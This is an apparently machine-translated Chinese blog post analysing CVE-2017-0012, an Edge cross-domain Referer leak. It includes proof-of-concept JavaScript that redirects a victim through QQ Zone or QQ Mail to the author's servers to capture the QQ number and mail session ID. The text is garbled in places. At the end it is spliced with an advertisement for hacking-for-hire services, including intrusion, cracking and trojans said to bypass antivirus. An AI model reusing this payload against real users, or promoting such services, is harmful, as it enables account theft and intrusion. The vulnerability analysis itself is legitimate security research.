前言 2017年3月14日,两天前,Microsoft Patch Day修复了Microsoft Edge中的多个漏洞。当用户访问攻击者构建良好的网页时,最严重的漏洞可能允许远程执行代码。成功利用这些漏洞的攻击者可以控制受影响的系统。本文分析了漏洞查找器的CVE-2017-0012 Microsoft浏览器欺骗漏洞。 微软官方公告:https://technet.microsoft.com/zh-cn/library/security/MS17-007 影响版本 Microsoft Edge Internet Explorer 11 漏洞分析 Parent.window.opener.location可用于打开其窗口位置以跳转到其他域名。当我尝试使用跨域时,我首先发现了这个问题。以下是我发现问题时的测试代码。 1 Parent.window.opener.location = 'http://www.qq.com'; 我通过360SRC友情链接打开了360的appscan.360.cn,并试图在appscan网页的控制台中输入这个JS。看到JS注入后,360SRC网页成为腾讯主页。
此时,我发现appscan控制台实际报告错误,并且内容属于腾讯主页资源错误。
如图所示,我们发现appscan控制台中显示的错误不属于appscan网站。然后我在Chrome,Firefox和IE8中测试了它,发现没有这样的问题。所以我第一次想到跨域,是否会出现跨域问题?所以我很快写了一个JS尝试,希望能实现跨域执行js。 1 2 3 4 五 6 函数 func(){ Parent.window.opener.location = 'http://www.qq.com'; } 如果 (parent.window.opener) { Parent.window.opener.location = 'javascript: alert('xsseng')'; setTimeout(func,'3000'); };
浏览器阻止了我的操作。问题应该在这里结束,但我发现了其他问题。当我执行以下代码时,我们可以在以下HTTP请求中看到REFERER。
我们通过appscan站点执行js,但引用标头是安全站点。这违反了W3C标准(所有浏览器都在这里由appscan网站处理),为了找出问题是否仅存在于同一个子域中,我将测试站点切换到两个完全不同的域。 利用场景 我写了一段代码,要求i.qq.com请求我的测试站点获取QQ空间的来源,其中ref.php直接输出$ _SERVER ['HTTP_REFERER']。
1 2 3 4 五 6 函数 func(){ Parent.window.opener.location = 'http://www.inetsrc.com/ref.php'; } 如果 (parent.window.opener) { Parent.window.opener.location = 'http://i.qq.com'; setTimeout(func,'3000'); };
可以发现,在测试网站中,不仅可以请求i.qq.com,而且如果我们登录QQ空间,i.qq.com将跳转到user.qzone.qq.com并显示您的QQ号码。然后问题不仅会导致更多的CSRF漏洞。如果用户登录到邮箱,则可以控制setTimeout以获取可能导致用户信息泄露的参数。出于这个原因,我构建了一个用于测试邮箱系统的测试站点。阅读SID。 1 2 3 4 五 6 函数 func(){ Parent.window.opener.location = 'https://www.esqsm.com/index.php'; } 如果 (parent.window.opener) { Parent.window.opener.location = 'https://mail.qq.com'; setTimeout(func,'3000'); };
由于QQ邮箱配置了SSL,因此接收源的站点也需要配置SSL。在这里,由于登陆QQ邮箱,当访问mail.qq.com时,它会跳转到邮箱的主页,导致更换位置,引用者会泄露用户信息。 参考资料 https://www.symantec.com/connect/blogs/2017-3 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0012 http://www.securityfocus.com/bid/96085/info 本文由原乘客安全发布,作者:xsseng 黑客业务列表介绍和一般分类: 类别:攻击入侵破解开发 1:攻击业务订单:暂时取消所有此类业务订单[仅销售常规IDC流量] 2:入侵业务清单:包括网站源代码,办公系统,黑色系统,教育系统等。 3:破解业务类:软件,加密文件,二次打包,脱壳等。 4:二次开发业务清单:软件二次开发,源代码二次开发等 5:其他业务订单:特洛伊木马[通过所有防病毒],远程控制,特殊软件等 备注:未提及的业务订单可根据主要类别查询或直接联系客户服务。为避免浪费双方时间,请在咨询前阅读:业务交易流程及相关说明 注意:仅接受正式业务,个人无权接受。收集此内容。